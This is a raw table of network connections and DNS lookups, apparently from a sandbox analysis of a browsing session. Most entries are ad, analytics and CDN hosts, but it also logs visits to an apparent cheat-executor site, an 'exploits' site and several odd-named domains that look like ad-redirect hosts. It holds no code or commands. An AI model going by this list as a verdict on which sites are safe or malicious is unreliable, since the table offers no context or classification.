| US | 8.8.8.8:53 | js.chargebee.com | udp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| GB | 2.18.190.136:443 | p.typekit.net | tcp |
| US | 8.8.8.8:53 | a1988.dscg1.akamai.net | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 104.18.10.207:443 | stackpath.bootstrapcdn.com | tcp |
| US | 104.18.10.207:443 | stackpath.bootstrapcdn.com | tcp |
| NL | 195.181.172.5:443 | maxst.icons8.com | tcp |
| US | 8.8.8.8:53 | stackpath.bootstrapcdn.com | udp |
| GB | 2.18.190.136:443 | a1988.dscg1.akamai.net | tcp |
| US | 8.8.8.8:53 | 1454623486.rsc.cdn77.org | udp |
| US | 8.8.8.8:53 | a1874.dscg1.akamai.net | udp |
| NL | 18.239.18.111:443 | js.chargebee.com | tcp |
| US | 8.8.8.8:53 | js.chargebee.com | udp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | a1988.dscg1.akamai.net | udp |
| US | 8.8.8.8:53 | js.chargebee.com | udp |
| US | 8.8.8.8:53 | 1454623486.rsc.cdn77.org | udp |
| US | 8.8.8.8:53 | a1874.dscg1.akamai.net | udp |
| US | 8.8.8.8:53 | stackpath.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| US | 8.8.8.8:53 | 50.135.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.22.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.204.110.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.24.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.10.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.172.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.18.239.18.in-addr.arpa | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | udp |
| US | 104.18.10.207:443 | stackpath.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | publisher.linkvertise.com | udp |
| US | 8.8.8.8:53 | euob.bizseasky.com | udp |
| US | 172.67.31.186:443 | publisher.linkvertise.com | tcp |
| US | 172.67.31.186:443 | publisher.linkvertise.com | tcp |
| US | 172.67.31.186:443 | publisher.linkvertise.com | tcp |
| US | 172.67.31.186:443 | publisher.linkvertise.com | tcp |
| US | 8.8.8.8:53 | publisher.linkvertise.com | udp |
| NL | 18.239.69.91:443 | euob.bizseasky.com | tcp |
| US | 8.8.8.8:53 | euob.bizseasky.com | udp |
| US | 8.8.8.8:53 | publisher.linkvertise.com | udp |
| US | 8.8.8.8:53 | www.clarity.ms | udp |
| US | 8.8.8.8:53 | euob.bizseasky.com | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | s-part-0036.t-0009.t-msedge.net | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | s-part-0036.t-0009.t-msedge.net | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | 232.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.31.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.69.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 172.67.31.186:443 | publisher.linkvertise.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | tcp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| GB | 184.25.192.27:443 | contextual.media.net | tcp |
| US | 13.107.246.64:443 | s-part-0036.t-0009.t-msedge.net | tcp |
| GB | 184.25.192.27:443 | contextual.media.net | udp |
| BE | 74.125.133.156:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.246.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.192.25.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.133.125.74.in-addr.arpa | udp |
| BE | 74.125.133.156:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | obseu.bizseasky.com | udp |
| US | 8.8.8.8:53 | b.clarity.ms | udp |
| IE | 3.248.162.96:443 | obseu.bizseasky.com | tcp |
| US | 4.153.129.168:443 | b.clarity.ms | tcp |
| US | 8.8.8.8:53 | obseu.bizseasky.com | udp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | obseu.bizseasky.com | udp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | api.taboola.com | udp |
| US | 8.8.8.8:53 | tls13.taboola.map.fastly.net | udp |
| US | 151.101.129.44:443 | tls13.taboola.map.fastly.net | tcp |
| US | 8.8.8.8:53 | c.clarity.ms | udp |
| US | 8.8.8.8:53 | tls13.taboola.map.fastly.net | udp |
| US | 8.8.8.8:53 | c-msn-com-nsatc.trafficmanager.net | udp |
| GB | 172.217.169.34:443 | ep1.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | c-msn-com-nsatc.trafficmanager.net | udp |
| US | 172.67.31.186:443 | publisher.linkvertise.com | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| GB | 172.217.169.34:443 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 172.217.169.1:443 | ep2.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | 96.162.248.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.129.153.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.129.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.169.217.172.in-addr.arpa | udp |
| GB | 172.217.169.1:443 | ep2.adtrafficquality.google | udp |
| IE | 13.74.129.1:443 | c-msn-com-nsatc.trafficmanager.net | tcp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 13.107.21.237:443 | c.bing.com | tcp |
| US | 8.8.8.8:53 | dual-a-0034.a-msedge.net | udp |
| US | 8.8.8.8:53 | dual-a-0034.a-msedge.net | udp |
| US | 8.8.8.8:53 | 1.129.74.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | am-api.taboola.com | udp |
| US | 8.8.8.8:53 | cdn.linkvertise.com | udp |
| US | 8.8.8.8:53 | images.taboola.com | udp |
| US | 8.8.8.8:53 | imagedelivery.net | udp |
| US | 8.8.8.8:53 | img.youtube.com | udp |
| US | 151.101.65.44:443 | images.taboola.com | tcp |
| US | 172.67.31.186:443 | cdn.linkvertise.com | tcp |
| US | 8.8.8.8:53 | cdn.linkvertise.com | udp |
| US | 172.67.31.186:443 | cdn.linkvertise.com | tcp |
| US | 104.18.3.36:443 | imagedelivery.net | tcp |
| US | 104.18.3.36:443 | imagedelivery.net | tcp |
| US | 104.18.3.36:443 | imagedelivery.net | tcp |
| US | 104.18.3.36:443 | imagedelivery.net | tcp |
| US | 104.18.3.36:443 | imagedelivery.net | tcp |
| US | 8.8.8.8:53 | imagedelivery.net | udp |
| US | 104.18.3.36:443 | imagedelivery.net | tcp |
| GB | 142.250.178.14:443 | img.youtube.com | tcp |
| US | 8.8.8.8:53 | ytimg.l.google.com | udp |
| US | 8.8.8.8:53 | cdn.linkvertise.com | udp |
| US | 8.8.8.8:53 | imagedelivery.net | udp |
| US | 172.67.31.186:443 | cdn.linkvertise.com | udp |
| US | 8.8.8.8:53 | ytimg.l.google.com | udp |
| US | 104.18.3.36:443 | imagedelivery.net | udp |
| GB | 142.250.178.14:443 | ytimg.l.google.com | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.65.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.3.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 151.101.193.44:443 | images.taboola.com | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 216.58.204.65:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | 44.193.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.204.58.216.in-addr.arpa | udp |
| GB | 216.58.204.65:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | b.clarity.ms | udp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.169.36:443 | www.google.com | tcp |
| GB | 172.217.169.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | 36.169.217.172.in-addr.arpa | udp |
| GB | 172.217.169.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | csp.withgoogle.com | udp |
| GB | 142.250.200.17:443 | csp.withgoogle.com | tcp |
| US | 8.8.8.8:53 | csp.withgoogle.com | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| GB | 142.250.200.17:443 | csp.withgoogle.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | 17.200.250.142.in-addr.arpa | udp |
| GB | 142.250.187.206:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | csp.withgoogle.com | udp |
| GB | 216.58.201.106:443 | ogads-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| GB | 216.58.201.106:443 | ogads-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| GB | 142.250.187.206:443 | play.google.com | udp |
| GB | 216.58.201.106:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 142.250.187.206:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 142.250.187.206:443 | consent.google.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| GB | 142.250.200.17:443 | csp.withgoogle.com | udp |
| US | 142.251.179.94:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | id.google.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| GB | 216.58.201.106:443 | ogads-pa.googleapis.com | udp |
| US | 142.251.179.94:443 | id.google.com | udp |
| US | 8.8.8.8:53 | 94.179.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | solaraexecutor.com | udp |
| DE | 167.235.14.29:443 | solaraexecutor.com | tcp |
| US | 8.8.8.8:53 | solaraexecutor.com | udp |
| US | 8.8.8.8:53 | solaraexecutor.com | udp |
| US | 8.8.8.8:53 | 29.14.235.167.in-addr.arpa | udp |
| DE | 167.235.14.29:443 | solaraexecutor.com | tcp |
| US | 8.8.8.8:53 | s10.histats.com | udp |
| US | 8.8.8.8:53 | s10.histats.com.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | s10.histats.com.cdn.cloudflare.net | udp |
| US | 172.66.132.114:443 | s10.histats.com.cdn.cloudflare.net | tcp |
| US | 8.8.8.8:53 | s4.histats.com | udp |
| CA | 149.56.240.129:443 | s4.histats.com | tcp |
| US | 8.8.8.8:53 | s4.histats.com | udp |
| US | 8.8.8.8:53 | s4.histats.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.178.14:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.132.66.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.240.56.149.in-addr.arpa | udp |
| GB | 142.250.178.14:443 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 142.250.200.1:443 | lh3.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | googlehosted.l.googleusercontent.com | udp |
| US | 8.8.8.8:53 | googlehosted.l.googleusercontent.com | udp |
| GB | 142.250.200.1:443 | googlehosted.l.googleusercontent.com | udp |
| US | 8.8.8.8:53 | 1.200.250.142.in-addr.arpa | udp |
| GB | 172.217.169.36:443 | www.google.com | tcp |
| GB | 172.217.169.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | www.kingexploits.com | udp |
| US | 34.149.87.45:443 | www.kingexploits.com | tcp |
| US | 8.8.8.8:53 | td-ccm-neg-87-45.wixdns.net | udp |
| US | 8.8.8.8:53 | td-ccm-neg-87-45.wixdns.net | udp |
| US | 34.149.87.45:443 | td-ccm-neg-87-45.wixdns.net | udp |
| US | 8.8.8.8:53 | static.parastorage.com | udp |
| US | 8.8.8.8:53 | static.wixstatic.com | udp |
| US | 8.8.8.8:53 | siteassets.parastorage.com | udp |
| US | 8.8.8.8:53 | dt3y1f1i1disy.cloudfront.net | udp |
| US | 34.49.229.81:443 | siteassets.parastorage.com | tcp |
| US | 8.8.8.8:53 | td-static-34-49-229-81.parastorage.com | udp |
| US | 34.49.229.81:443 | td-static-34-49-229-81.parastorage.com | tcp |
| US | 34.49.229.81:443 | td-static-34-49-229-81.parastorage.com | tcp |
| NL | 18.239.82.145:443 | dt3y1f1i1disy.cloudfront.net | tcp |
| US | 8.8.8.8:53 | d1cq301dpr7fww.cloudfront.net | udp |
| NL | 18.239.69.89:443 | d1cq301dpr7fww.cloudfront.net | tcp |
| NL | 18.239.69.89:443 | d1cq301dpr7fww.cloudfront.net | tcp |
| US | 8.8.8.8:53 | td-static-34-49-229-81.parastorage.com | udp |
| US | 34.49.229.81:443 | td-static-34-49-229-81.parastorage.com | tcp |
| US | 34.49.229.81:443 | td-static-34-49-229-81.parastorage.com | tcp |
| US | 34.49.229.81:443 | td-static-34-49-229-81.parastorage.com | tcp |
| US | 34.49.229.81:443 | td-static-34-49-229-81.parastorage.com | tcp |
| US | 34.49.229.81:443 | td-static-34-49-229-81.parastorage.com | tcp |
| US | 34.49.229.81:443 | td-static-34-49-229-81.parastorage.com | tcp |
| US | 34.49.229.81:443 | td-static-34-49-229-81.parastorage.com | tcp |
| US | 34.49.229.81:443 | td-static-34-49-229-81.parastorage.com | tcp |
| US | 34.49.229.81:443 | td-static-34-49-229-81.parastorage.com | tcp |
| US | 34.49.229.81:443 | td-static-34-49-229-81.parastorage.com | tcp |
| US | 8.8.8.8:53 | dt3y1f1i1disy.cloudfront.net | udp |
| US | 8.8.8.8:53 | d1cq301dpr7fww.cloudfront.net | udp |
| US | 34.49.229.81:443 | td-static-34-49-229-81.parastorage.com | udp |
| US | 34.49.229.81:443 | td-static-34-49-229-81.parastorage.com | udp |
| NL | 18.239.82.145:443 | dt3y1f1i1disy.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 45.87.149.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.229.49.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.82.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ukankingwithea.com | udp |
| US | 8.8.8.8:53 | kinarilyhukelpfulin.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 104.21.68.94:443 | ukankingwithea.com | tcp |
| US | 104.21.68.94:443 | ukankingwithea.com | tcp |
| US | 8.8.8.8:53 | ukankingwithea.com | udp |
| US | 8.8.8.8:53 | frog.wix.com | udp |
| US | 8.8.8.8:53 | panorama.wixapps.net | udp |
| US | 8.8.8.8:53 | star-mini.c10r.facebook.com | udp |
| US | 172.67.151.197:443 | kinarilyhukelpfulin.com | tcp |
| US | 172.67.151.197:443 | kinarilyhukelpfulin.com | tcp |
| US | 8.8.8.8:53 | kinarilyhukelpfulin.com | udp |
| NL | 173.194.69.84:443 | accounts.google.com | tcp |
| NL | 173.194.69.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | ordinghology.com | udp |
| US | 8.8.8.8:53 | ukankingwithea.com | udp |
| US | 54.85.244.43:443 | frog.wix.com | tcp |
| US | 54.85.244.43:443 | frog.wix.com | tcp |
| US | 54.85.244.43:443 | frog.wix.com | tcp |
| US | 54.85.244.43:443 | frog.wix.com | tcp |
| US | 8.8.8.8:53 | bi-flogger-alb-ext-343643057.us-east-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | star-mini.c10r.facebook.com | udp |
| US | 8.8.8.8:53 | kinarilyhukelpfulin.com | udp |
| US | 34.149.206.255:443 | panorama.wixapps.net | tcp |
| US | 8.8.8.8:53 | glb-editor.wix.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | ordinghology.com | udp |
| GB | 18.244.164.115:443 | ordinghology.com | tcp |
| US | 8.8.8.8:53 | bi-flogger-alb-ext-343643057.us-east-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | glb-editor.wix.com | udp |
| US | 8.8.8.8:53 | ordinghology.com | udp |
| NL | 18.239.69.89:443 | d1cq301dpr7fww.cloudfront.net | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| US | 104.21.68.94:443 | ukankingwithea.com | udp |
| US | 34.49.229.81:443 | td-static-34-49-229-81.parastorage.com | udp |
| US | 172.67.151.197:443 | kinarilyhukelpfulin.com | udp |
| GB | 142.250.178.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| NL | 173.194.69.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.178.22:443 | i.ytimg.com | udp |
| NL | 18.239.69.89:443 | d1cq301dpr7fww.cloudfront.net | udp |
| US | 34.149.206.255:443 | glb-editor.wix.com | udp |
| US | 8.8.8.8:53 | loaksandtheir.info | udp |
| GB | 163.70.151.35:443 | star-mini.c10r.facebook.com | tcp |
| US | 8.8.8.8:53 | ghabovethec.info | udp |
| GB | 54.192.137.93:443 | loaksandtheir.info | tcp |
| US | 8.8.8.8:53 | loaksandtheir.info | udp |
| GB | 18.244.140.110:443 | ghabovethec.info | tcp |
| US | 8.8.8.8:53 | ghabovethec.info | udp |
| US | 8.8.8.8:53 | loaksandtheir.info | udp |
| US | 8.8.8.8:53 | ghabovethec.info | udp |
| US | 8.8.8.8:53 | 94.68.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.151.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.69.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 255.206.149.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.164.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.244.85.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.69.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.137.192.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.140.244.18.in-addr.arpa | udp |
| GB | 163.70.151.35:443 | star-mini.c10r.facebook.com | udp |
| US | 142.251.179.94:443 | id.google.com | tcp |
| GB | 142.250.200.17:443 | csp.withgoogle.com | tcp |
| GB | 142.250.200.17:443 | csp.withgoogle.com | udp |
| US | 142.251.179.94:443 | id.google.com | udp |
| GB | 216.58.201.106:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| GB | 142.250.187.206:443 | consent.google.com | udp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yandex.ru | udp |
| RU | 77.88.55.88:443 | yandex.ru | tcp |
| US | 8.8.8.8:53 | yandex.ru | udp |
| US | 8.8.8.8:53 | yandex.ru | udp |
| US | 8.8.8.8:53 | yastatic.net | udp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| US | 8.8.8.8:53 | yastatic.net | udp |
| US | 8.8.8.8:53 | yastatic.net | udp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| US | 8.8.8.8:53 | 88.55.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.131.154.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| RU | 77.88.21.119:443 | mc.yandex.ru | tcp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| GB | 142.250.200.14:443 | youtube-ui.l.google.com | tcp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | avatars.mds.yandex.net | udp |
| US | 8.8.8.8:53 | obseu.bizseasky.com | udp |
| RU | 87.250.247.183:443 | avatars.mds.yandex.net | tcp |
| US | 8.8.8.8:53 | avatars.mds.yandex.net | udp |
| GB | 142.250.200.14:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | obseu.bizseasky.com | udp |
| IE | 3.248.162.96:443 | obseu.bizseasky.com | tcp |
| US | 8.8.8.8:53 | avatars.mds.yandex.net | udp |
| US | 8.8.8.8:53 | 119.21.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.247.250.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 216.58.212.230:443 | static.doubleclick.net | tcp |
| GB | 216.58.212.230:443 | static.doubleclick.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | udp |
| GB | 216.58.212.230:443 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | 230.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 172.217.169.36:443 | www.google.com | tcp |
| GB | 142.250.178.22:443 | i.ytimg.com | tcp |
| GB | 172.217.16.234:443 | jnn-pa.googleapis.com | tcp |
| GB | 172.217.16.234:443 | jnn-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | sourceforge.net | udp |
| US | 104.18.37.111:443 | sourceforge.net | tcp |
| US | 8.8.8.8:53 | sourceforge.net | udp |
| US | 8.8.8.8:53 | sourceforge.net | udp |
| US | 104.18.37.111:443 | sourceforge.net | udp |
| GB | 172.217.169.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| GB | 142.250.178.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 234.16.217.172.in-addr.arpa | udp |
| GB | 172.217.16.234:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 111.37.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr5---sn-aigl6nek.googlevideo.com | udp |
| GB | 173.194.183.106:443 | rr5---sn-aigl6nek.googlevideo.com | tcp |
| GB | 173.194.183.106:443 | rr5---sn-aigl6nek.googlevideo.com | tcp |
| US | 8.8.8.8:53 | rr5.sn-aigl6nek.googlevideo.com | udp |
| GB | 142.250.187.206:443 | youtube-ui.l.google.com | tcp |
| US | 8.8.8.8:53 | rr5.sn-aigl6nek.googlevideo.com | udp |
| GB | 172.217.16.234:443 | jnn-pa.googleapis.com | udp |
| GB | 173.194.183.106:443 | rr5.sn-aigl6nek.googlevideo.com | udp |
| GB | 142.250.187.206:443 | youtube-ui.l.google.com | udp |
| RU | 77.88.21.179:443 | ads.adfox.ru | tcp |
| US | 8.8.8.8:53 | ads.adfox.ru | udp |
| US | 8.8.8.8:53 | ads.adfox.ru | udp |
| US | 8.8.8.8:53 | 106.183.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.21.88.77.in-addr.arpa | udp |
| GB | 142.250.180.1:443 | yt3.ggpht.com | tcp |
| US | 8.8.8.8:53 | photos-ugc.l.googleusercontent.com | udp |
| GB | 142.250.180.1:443 | yt3.ggpht.com | tcp |
| US | 8.8.8.8:53 | photos-ugc.l.googleusercontent.com | udp |
| US | 8.8.8.8:53 | challenges.cloudflare.com | udp |
| GB | 142.250.180.1:443 | yt3.ggpht.com | udp |
| US | 104.18.95.41:443 | challenges.cloudflare.com | tcp |
| US | 8.8.8.8:53 | challenges.cloudflare.com | udp |
| US | 8.8.8.8:53 | challenges.cloudflare.com | udp |
| US | 8.8.8.8:53 | static-mon.yandex.net | udp |
| US | 104.18.95.41:443 | challenges.cloudflare.com | udp |
| US | 8.8.8.8:53 | cryprox.yandex.net | udp |
| RU | 87.250.251.92:443 | cryprox.yandex.net | tcp |
| US | 8.8.8.8:53 | favicon.yandex.net | udp |
| US | 8.8.8.8:53 | cryprox.yandex.net | udp |
| US | 8.8.8.8:53 | an.yandex.ru | udp |
| RU | 213.180.204.36:443 | favicon.yandex.net | tcp |
| US | 8.8.8.8:53 | favicon.yandex.net | udp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| RU | 213.180.204.90:443 | an.yandex.ru | tcp |
| RU | 213.180.204.90:443 | an.yandex.ru | tcp |
| US | 8.8.8.8:53 | an.yandex.ru | udp |
| US | 8.8.8.8:53 | favicon.yandex.net | udp |
| RU | 87.250.251.119:443 | mc.yandex.com | tcp |
| US | 8.8.8.8:53 | an.yandex.ru | udp |
| US | 8.8.8.8:53 | 1.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.95.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.251.250.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.204.180.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.204.180.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.251.250.87.in-addr.arpa | udp |
| GB | 142.250.187.206:443 | youtube-ui.l.google.com | udp |
| RU | 87.250.251.92:443 | cryprox.yandex.net | tcp |
| US | 8.8.8.8:53 | b.clarity.ms | udp |
| US | 4.153.129.168:443 | b.clarity.ms | tcp |
| US | 8.8.8.8:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
